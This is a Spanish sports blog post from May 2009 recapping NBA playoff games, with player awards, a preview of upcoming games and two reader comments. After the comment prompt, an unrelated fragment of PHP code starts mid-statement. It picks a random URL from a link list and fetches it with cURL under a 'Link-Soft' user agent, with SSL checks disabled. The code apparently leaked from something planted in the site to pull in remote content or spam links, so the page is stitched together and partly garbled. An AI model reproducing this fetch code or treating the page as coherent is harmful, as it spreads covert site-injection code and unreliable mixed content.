Playoffs (04/05/2009): Round Two!!

04 de May de 2009 por TheDeerHunter

By TheDeerHunter & Txusma

Finalizó por fin esta primera ronda de playoffs que debería pasar a la historia. La última cuestión que quedaba por resolver era esa teórica óptima capacidad de los Hawks para lograr frenar a Dwyane Wade. Al final no ha acabado de quedar claro si pueden sacar pecho en este sentido ya que la batalla ha quedado en tablas (o incluso la ha ganado Flash por los puntos), pero sí se ha confirmado que colectivamente son superiores a los Heat y que han marcado mayores diferencias a medida que han logrado controlar a sus menos incisivos compañeros.

No se puede decir que Wade flaqueara anoche. Anduvo algo más errático que de costumbre, pero sólo hubiera tenido opciones rondando los 50 puntos y no hace falta decir lo complicado que resulta en un choque como el de ayer. Sólo Beasley le echó una mano con la anotación y algo también Haslem, aunque este último fuera el primero en abandonar el barco en un cruce de cables excesivamente forzado. A partir de ahí el vacío cósmico. Con Jermaine O’Neal con problemas físicos y Chalmers o Cook desaparecidos en combate este equipo no tiene nada. El modelo de uno contra el mundo suele tener poco recorrido en la postemporada incluso si ese “uno” es un purasangre como lo es Wade.

Pero estos partidos hay que ganarlos y los chicos de Spoelstra han demostrado saber defenderse. Anoche no. Una de esas en las que Joe Jonson abre cualquier lata reventándola a triplacos. No hubo defensa posible y las casi dos decenas de pérdidas terminaron de matar las opciones de los Heat. Bastante habían hecho ya.

La primera serie de las semifinales de conferencia en empezar ha sido la Denver-Dallas. En ella, los Nuggets consolidaron su magnífica racha de 14 victorias seguidas en el Pepsi Center y su imbatibilidad contra los Mavericks en esta temporada. El partido, sin embargo, fue lo suficientemente atípico como para no sacar conclusiones precipitadas.

Los Mavs empezaron fortísimos, hasta que Dampier y Josh Howard, sus dos hombres más en forma en estos playoffs, sufrieron sendas torceduras de tobillo. A partir de ese momento, Nené se puso las botas manteniendo a su equipo en el juego a pesar de un mal partido de Billups y Melo. La segunda unidad de Denver estuvo formidable, con JR Smith y unos Chris Andersen y Anthony Carter increíbles. Con todo se llegó con un 82-80 a los últimos minutos. Pero un desastre de ataque dirigido por Jason Kidd y el resurgir de Melo rompieron definitivamente el partido antes de tiempo. Ya se velan armas para el próximo duelo.

PREMIOS

MVP: Tras una serie un tanto decepcionante y un inicio de partido con 5 tiros consecutivos fallados, Joe Johnson despertó. En el partido decisivo de la serie anotó 27 puntos, con 6 de 8 en triples, 5 rebotes, 4 asistencias y 4 robos.

Rookie: A pesar de que su incapacidad para repartir asistencias es digna de estudio, anoche Michael Beasley se convirtió de nuevo en el mejor escudero de Dwyane Wade con 17 puntos y 7 rebotes.

Sorpresa: ¿Quién iba a pensar que Chris Andersen se iba a convertir en una de las claves del éxito de los Nuggets durante toda su temporada? Anoche consiguió 11 puntos, 6 rebotes y 6 tapones y se peleó con relativo éxito con Dirk Nowitzki.

Decepción: Anoche les tocó a otros anotar y es que Chauncey Billups se quedó en 6 puntos con 2 de 8 en tiros de campo. A pesar de eso, victoria de los Nuggets y es que la labor del base está más allá de la canasta.

Esfuerzo en vano: Ex-aquo para, como no, Dwyane Wade y Dirk Nowitzki. 31 puntos para el primero y 28 puntos y 10 rebotes para el segundo.

RAZONES PARA TRASNOCHAR

Finalizó una primera ronda que será recordada por una de las mejores series del XXI pero los Playoffs continúan y lo hacen con 2 partidazos

– Orlando @ Boston (2.00h): Boston llega fundido y definitivamente sin Kevin Garnett. Orlando pasa apuros con Dwight Howard en pista y arrasa a Philadelphia cuando él falta… Una eliminatoria que no  por esperada  será apasionante.

– Houston @ Los Angeles (4.30h): Nadie apuesta porque los Rockets puedan vencer en más de una ocasión a los Lakers pero esto hay que jugarlo. Sin T-Mac, cualquier cosa es posible una vez pasada la primera ronda.

Comenta

2 comentarios a esta entrada

  1. Angel dice:
    #1

    Muy buena la última frase de T-MAC, vaya fama de gafe que se tiene ganada el amigo…

    En cuanto a lo de ayer, pues sorprendentes los Hawks, yo pensaba que solo el efecto Wade sería suficiente para los Heat se llevasen la serie.

    La serie Dallas – Nuggets, a poco que se entonen los “secundarios” de Dallas va a ser interesante, no por el juego, sino por lo reñido.

    Un saludo!!

      Citar

  2. Fran Reyes dice:
    #2

    Ayer me quedé asombradísimo con el juego de Chris Andersen. Tenía a BirdMan por una mediocridad con buena imagen, pero partidos como el de ayer… defensivamente es un león, ofensivamente hiperactivo. ¡Tremendo!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>